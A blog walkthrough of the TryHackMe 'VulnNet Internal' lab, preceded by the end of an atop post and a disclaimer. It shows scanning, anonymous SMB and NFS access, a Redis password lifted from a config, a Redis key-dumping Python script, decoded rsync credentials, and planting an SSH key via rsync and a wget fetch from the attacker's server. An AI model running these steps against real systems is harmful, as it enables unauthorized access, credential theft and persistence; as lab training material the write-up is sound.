              -j  show cumulated process-info per container
    
              -C  sort processes in order of cpu consumption (default)
              -M  sort processes in order of memory consumption
              -D  sort processes in order of disk activity
              -N  sort processes in order of network activity
              -E  sort processes in order of GPU activity
              -A  sort processes in order of most active resource (auto mode)
    
            specific flags for raw logfiles:
              -w  write raw data to   file (compressed)
              -r  read  raw data from file (compressed)
                  symbolic file: y[y...] for yesterday (repeated)
                  file name '-': read raw data from stdin
              -S  finish atop automatically before midnight (i.s.o. #samples)
              -b  begin showing data from specified date/time
              -e  finish showing data after specified date/time
    
            interval: number of seconds   (minimum 0)
            samples:  number of intervals (minimum 1)
    
    If the interval-value is zero, a new sample can be
    forced manually by sending signal USR1 (kill -USR1 pid_atop)
    or with the keystroke 't' in interactive mode.
    
    Please refer to the man-page of 'atop' for more details.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$                                              
    
    




     

    Advantages of atop


    Atop is an ASCII, full-screen performance monitor which can log and report the activity of all server processes. One feature I really like is that atop stays active in the background for long-term server analysis (up to 28 days by default). Other advantages include:

    • Shows resource usage of all processes, even those that are closed or completed.
    • Monitors threads within processes and ignores processes that are unused.
    • Accumulates resource usage for all processes and users with the same name.
    • Highlights critical resources using colors (red).
    • Adds or removes columns as the size of the display window changes.
    • Includes disk I/O and network utilization.
    • Uses the netatop kernel module to monitor TCP, UDP, and network bandwidth.






    Disclaimer

     

    This was written for educational purposes and penetration testing only.
    The author will not be responsible for any damage.
    The author is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal.


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about ethical hacking, security, penetration testing and malware analysis. Hacking Truth is against misuse of the information and we strongly advise against it. Please read the word hacking as ethical hacking or penetration testing every time it is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission. We want to raise security awareness and inform our readers on how to protect themselves from becoming victims of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post; if so, don't forget to share it.
    Thank you so much :-)

     

  • TryHackMe VulnNet Internal As a Penetration Testing

     

     

    TryHackMe VulnNet Internal As a Penetration Testing

     

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable way to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.



    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      

     

    Room description: "VulnNet Entertainment learns from its mistakes, and now they have something new for you..."


    We start the room with a full port scan. I ran threader3000 for a quick sweep of all ports while nmap worked through the target; the nmap run below covers all 65535 TCP ports (-p-) with service detection and default scripts (-A, which already implies -sV), so its output is what we work from.

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.155.145
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    Scanning 10.10.155.145 [65535 ports]
    Discovered open port 111/tcp on 10.10.155.145
    Discovered open port 22/tcp on 10.10.155.145
    Discovered open port 139/tcp on 10.10.155.145
    Discovered open port 445/tcp on 10.10.155.145
    Discovered open port 45811/tcp on 10.10.155.145
    Discovered open port 51665/tcp on 10.10.155.145
    Discovered open port 57017/tcp on 10.10.155.145
    Discovered open port 39557/tcp on 10.10.155.145
    Discovered open port 2049/tcp on 10.10.155.145
    Discovered open port 6379/tcp on 10.10.155.145
    Discovered open port 873/tcp on 10.10.155.145
    Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
    Nmap scan report for 10.10.155.145
    Host is up, received user-set (0.21s latency).
    Scanned at 2021-05-10 19:10:58 IST for 561s
    Not shown: 65523 closed ports
    Reason: 65523 resets
    PORT      STATE    SERVICE     REASON         VERSION
    22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
    |   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
    |   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
    111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3           2049/udp   nfs
    |   100003  3           2049/udp6  nfs
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      40068/udp6  mountd
    |   100005  1,2,3      51665/tcp   mountd
    |   100005  1,2,3      51843/tcp6  mountd
    |   100005  1,2,3      56229/udp   mountd
    |   100021  1,3,4      39572/udp6  nlockmgr
    |   100021  1,3,4      39935/tcp6  nlockmgr
    |   100021  1,3,4      45811/tcp   nlockmgr
    |   100021  1,3,4      48120/udp   nlockmgr
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
    2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
    6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
    9090/tcp  filtered zeus-admin  no-response
    39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
    51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
               Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    
    
    
    
    
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -p 445  --script=smb-enum-shares.nse, smb-enum-users.nse  10.10.155.145
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
    Failed to resolve "smb-enum-users.nse".
    Nmap scan report for 10.10.155.145
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.155.145\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: 
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\10.10.155.145\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: 
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: 
    |     Current user access: 
    |   \\10.10.155.145\shares: 
    |     Type: STYPE_DISKTREE
    |     Comment: VulnNet Business Shares
    |     Users: 0
    |     Max Users: 
    |     Path: C:\opt\shares
    |     Anonymous access: READ/WRITE
    |_    Current user access: READ/WRITE
    
    Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$                                                       
    
    
    

     

     

     

    The scan shows several services worth enumerating: SSH (22), rpcbind with NFS (111, 2049), SMB (139/445), rsync (873) and Redis (6379). Note the mistake in the script list above: the space after the comma made nmap treat smb-enum-users.nse as a target name, which is why it reports "Failed to resolve"; the correct form is --script=smb-enum-shares,smb-enum-users. The share enumeration still ran and shows that the guest account has READ/WRITE access to the "shares" share, so we start with SMB.


    SMB Enumeration: 139 & 445

     

     

    We run enum4linux from our machine against the target IP.

     

     





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ enum4linux 10.10.155.145                                                   
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.155.145
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
    
     ========================================== 
    |    Share Enumeration on 10.10.155.145    |
     ========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            print$          Disk      Printer Drivers
            shares          Disk      VulnNet Business Shares
            IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
    
    [+] Attempting to map shares on 10.10.155.145
    //10.10.155.145/print$  Mapping: DENIED, Listing: N/A
    //10.10.155.145/shares  Mapping: OK, Listing: OK
    //10.10.155.145/IPC$    [E] Can't understand response:
    NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
    
    
    
    enum4linux complete on Mon May 10 19:27:33 2021
    
                                                                                                                                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    
    
    
    
    
    

     

     


     

    The "shares" share can be opened without credentials: smbclient prompts for a password, but an empty one is accepted (the -N switch skips the prompt).


     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo smbclient //10.10.155.145/shares
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.            
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    
    smb: \> cd temp
    smb: \temp\> ls
    
      services.txt                        N       38  Sat Feb  6 17:15:09 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    smb: \temp\> get services.txt
    getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) 
    smb: \temp\> cd ..
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \> cd data
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> get data.txt
    getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \data\> get business-req.txt
    getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> cd 
    smb: \> pwd
    Current directory is \\10.10.155.145\shares\
    smb: \> exit
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    
    
    
    

     

     


     

     

     

    Browsing the share turns up three small files. Only services.txt is useful: it holds the first flag. data.txt and business-req.txt are just noise.

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat services.txt    
    THM{0a09d51e488f5fa105d8d866a497440a}
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat data.txt    
    Purge regularly data that is not needed anymore
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat business-req.txt
    We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
    If you have any questions, please text or phone us.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$                          
    
    
    
    
    

     

     


     


    NFS (port 2049) is also open, so I check what the server exports with showmount.

     

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo showmount -e 10.10.155.145               
    Export list for 10.10.155.145:
    /opt/conf *
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     


     

     

    Exploit

     

     

    showmount lists the exports; /opt/conf is exported to *, meaning any host can mount it with no authentication at all. We create a local directory and mount the export into it.
     

     


     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir conf            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ cd conf  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ ls
    hp  init  opt  profile.d  redis  vim  wildmidi
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ cd redis 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$    
    
    

     

     


     

     

     

     

    Enumerating the mount, we go straight to the redis directory. redis.conf contains a requirepass directive with the Redis password in clear text. Save it; we need it shortly.

     

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ cat redis.conf 
    # Redis configuration file example.
    #
    
    # If the master is password protected (using the "requirepass" configuration
    # directive below) it is possible to tell the slave to authenticate before
    # starting the replication synchronization process, otherwise the master will
    # refuse the slave request.
    #
    # masterauth 
    
    requirepass "B65Hx562F@ggAZ@F"
    #
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ 
    

     

     


     

     

    Redis Enumeration: 6379

     

    Redis (the Remote Dictionary Server) is an in-memory key-value store. It can be enumerated with netcat, the Metasploit auxiliary scanner or redis-cli; redis-cli is the most convenient.

    If redis-cli is not installed, it ships in the redis-tools package on Debian-based systems:

    sudo apt-get install redis-tools

    We connect with redis-cli using the password recovered from redis.conf and query the server for the keys it holds. Note the warning redis-cli prints: passing the password with -a leaves it in the shell history and the process list. Alternatives are to connect without -a and issue AUTH interactively, or to put the password in the REDISCLI_AUTH environment variable.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> get "internal flag"
    "THM{ff8e518addbbddb74531a724236a8221}"
    10.10.155.145:6379> 
                                    
    


     


    Redis commands are documented at https://redis.io/commands. KEYS * lists the keys, and GET on the string key "internal flag" returns the second flag.

    authlist is not a string, so GET fails on it with WRONGTYPE. TYPE shows it is a list, and LRANGE dumps its elements. LRANGE indices are zero-based, so "lrange authlist 1 100" skips the first element; "lrange authlist 0 -1" returns the whole list. The entries shown are identical anyway.

     




     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> type authlist
    list                                                                                                                                            
    10.10.155.145:6379> lrange authlist 1 100
    1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                           
    2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    10.10.155.145:6379> 
    

     

     


     

    Decoding the authlist entries

     

    The character set and the trailing == padding mark this as base64, which is an encoding rather than a cipher, so no key is needed. Let's decode it.

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
    Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
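    The two steps above, dumping every key with the command that fits its type and base64-decoding the authlist entries, can be done in one pass. The script below is an added example for this write-up; it is not redis-cli and not part of the room. It speaks the RESP protocol to the server over a plain socket with the standard library only. The host, port and password defaults are the ones found in this room and are assumptions anywhere else; KEYS * is used because the instance is tiny (use SCAN on a real server).

```python
"""Dump every key from a password-protected Redis instance, reading each key
with the command that fits its type, and base64-decode values that look
encoded. Added example for this write-up (not redis-cli, not the room's code):
RESP over a plain socket, standard library only. Host, port and password
defaults are the room's values and are assumptions anywhere else."""
import base64
import binascii
import io
import re
import socket
import sys

B64_RE = re.compile(rb"^[A-Za-z0-9+/]{16,}={0,2}$")   # long base64 run, optional padding

READ_BY_TYPE = {                                     # whole-value read per TYPE reply
    "string": lambda k: ("GET", k),
    "list": lambda k: ("LRANGE", k, "0", "-1"),      # LRANGE is 0-based; 0..-1 is the full list
    "set": lambda k: ("SMEMBERS", k),
    "zset": lambda k: ("ZRANGE", k, "0", "-1"),
    "hash": lambda k: ("HGETALL", k),
}


def encode_command(*parts: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli sends it."""
    out = [f"*{len(parts)}\r\n".encode()]
    for part in parts:
        raw = part.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)


def read_reply(stream):
    """Parse one RESP2 reply from a binary stream offering readline() and read(n)."""
    line = stream.readline()
    if not line.endswith(b"\r\n"):
        raise ConnectionError("connection closed mid-reply")
    kind, body = line[:1], line[1:-2]
    if kind == b"+":                     # simple string: +OK, +list
        return body.decode()
    if kind == b"-":                     # error: -NOAUTH, -WRONGTYPE, -ERR invalid password
        raise RuntimeError(body.decode())
    if kind == b":":                     # integer
        return int(body)
    if kind == b"$":                     # bulk string; $-1 is nil
        length = int(body)
        return None if length < 0 else stream.read(length + 2)[:length]
    if kind == b"*":                     # array; *-1 is nil
        count = int(body)
        return None if count < 0 else [read_reply(stream) for _ in range(count)]
    raise ValueError(f"unexpected RESP type byte {kind!r}")


def parse_reply(raw: bytes):
    """Parse a complete reply held in memory (used by the offline checks)."""
    return read_reply(io.BytesIO(raw))


def flatten(reply) -> list:
    """Flatten a reply (scalar, nested list or nil) into a list of scalars."""
    if reply is None:
        return []
    if isinstance(reply, list):
        return [item for sub in reply for item in flatten(sub)]
    return [reply]


def maybe_b64_decode(value: bytes) -> bytes:
    """Return the decoded bytes if value is base64 that yields UTF-8 text, else value unchanged."""
    candidate = value.strip()
    if not B64_RE.match(candidate):
        return value
    try:
        decoded = base64.b64decode(candidate, validate=True)
        decoded.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value
    return decoded


def dump_keys(host: str, port: int = 6379, password: str = "") -> dict:
    """Return {key: (type, [values])} for every key, authenticating first if needed."""
    with socket.create_connection((host, port), timeout=10) as sock:
        stream = sock.makefile("rwb")

        def command(*parts):
            stream.write(encode_command(*parts))
            stream.flush()
            return read_reply(stream)

        if password:
            command("AUTH", password)            # RuntimeError on a wrong password
        results = {}
        for key in flatten(command("KEYS", "*")):   # fine on a tiny CTF box; use SCAN in production
            name = key.decode()
            ktype = command("TYPE", name)
            reader = READ_BY_TYPE.get(ktype)        # unknown types (e.g. stream) are listed, not read
            values = flatten(command(*reader(name))) if reader else []
            results[name] = (ktype, [maybe_b64_decode(v) if isinstance(v, bytes) else v for v in values])
        return results


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.155.145"
    password = sys.argv[2] if len(sys.argv) > 2 else "B65Hx562F@ggAZ@F"
    for name, (ktype, values) in dump_keys(host, 6379, password).items():
        print(f"[{ktype}] {name}")
        for v in values:
            print("   ", v.decode("utf-8", "replace").rstrip("\n") if isinstance(v, bytes) else v)
```

    Run it as "python3 redis_dump.py 10.10.155.145 'B65Hx562F@ggAZ@F'"; the password is passed as an argument here only for brevity and has the same history and process-list exposure as redis-cli -a. A wrong password surfaces as a RuntimeError carrying the server's -ERR text rather than a silent empty result.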
    
    

     

     

    The decoded text is a credential for the rsync daemon: user rsync-connect, password Hcg3HP67@TW@Bc72v. It names 127.0.0.1, but the initial nmap scan showed rsync listening on 873 for remote clients too, so we can use it from our machine.

     

    Enumerating rsync


    A quick look at rsync --help refreshes the switches we need; --list-only against the daemon URL lists the modules it exports.

     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av --list-only rsync://10.10.155.145:873
    files           Necessary home interaction
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     

    Creating a folder and copying the files

     

    Pulling the files module down with the rsync-connect credentials gives us a home directory, sys-internal, containing user.txt. The directory name is also a local username, and .sudo_as_admin_successful tells us that account has used sudo at some point. Nothing else here is immediately useful, but if the module is writable we can drop an SSH public key into sys-internal/.ssh and log in over SSH.

     


     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir files
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync
    Password: 
    receiving incremental file list
    created directory ./rsync
    ./
    sys-internal/
    sys-internal/.bashrc
    sys-internal/.rediscli_history -> /dev/null
    sys-internal/.sudo_as_admin_successful
    sys-internal/.xsession-errors.old
    sys-internal/user.txt
    
    
    
    

     

     



    Besides downloading files such as user.txt, the module is writable, so I can upload an authorized_keys file into .ssh and log in over SSH. First, generate a key pair on the local machine.


     

     

    No passphrase is set on this key (press Enter twice). On a real engagement, protect the private key with a passphrase and remove the public key from the target's authorized_keys when you are done.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh-keygen -f ./id_rsa                                                             
    Generating public/private rsa key pair.
    Enter passphrase (empty for no passphrase): 
    Enter same passphrase again: 
    Your identification has been saved in ./id_rsa
    Your public key has been saved in ./id_rsa.pub
    The key fingerprint is:
    SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
    The key's randomart image is:
    +---[RSA 3072]----+
    |                 |
    |                 |
    |                 |
    |   . .           |
    |. + = . S        |
    | o B   o+..      |
    |  o + *=.*..     |
    |  .+ X+B@ooo.    |
    | oo.O+O@+=E.     |
    +----[SHA256]-----+
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     


     

    With the key generated, I make a copy of id_rsa.pub named authorized_keys (sudo is not needed for this). The copy is used by the HTTP method below; the rsync upload can rename the file on the fly.

     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls                                                                                                                                    
    id_rsa  id_rsa.pub  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo cp id_rsa.pub authorized_keys                                                 
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    authorized_keys id_rsa  id_rsa.pub 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     


     

    Upload the public key as sys-internal/.ssh/authorized_keys, authenticating as rsync-connect with the password Hcg3HP67@TW@Bc72v when prompted. --inplace writes the file directly, and --no-o --no-g stop rsync from trying to preserve owner and group, which -a would otherwise request. This works because the .ssh directory already exists on the target; rsync does not create the parent directory for a single-file transfer unless --mkpath (rsync 3.2.3+) is given.

     


     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
    Password: 
    sending incremental file list
    id_rsa.pub
    
    sent 674 bytes  received 35 bytes  18.42 bytes/sec
    total size is 580  speedup is 0.82
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     



    Other Method for Uploading a File


    Alternatively, serve the file from our machine with Python's built-in HTTP server and fetch it from the target. This needs a shell on the target already, so it is useful for re-dropping a key rather than for the initial foothold.

    python3 -m http.server 1234

     

     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ python3 -m http.server 1234
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
    10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
    10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
    10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
    ^C  
    Keyboard interrupt received, exiting.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     


     

     

    Browsing to http://10.8.61.234:1234 (your own VPN IP and the port chosen above) shows the directory listing.

     

     

     


     



    Copy the link to authorized_keys from the listing.

    Then download it on the target (sys-internal@vulnnet-internal) into ~/.ssh with wget. wget is installed on the target; curl is not.

     

     


    sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
    --2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
    Connecting to 10.8.61.234:1234... connected.
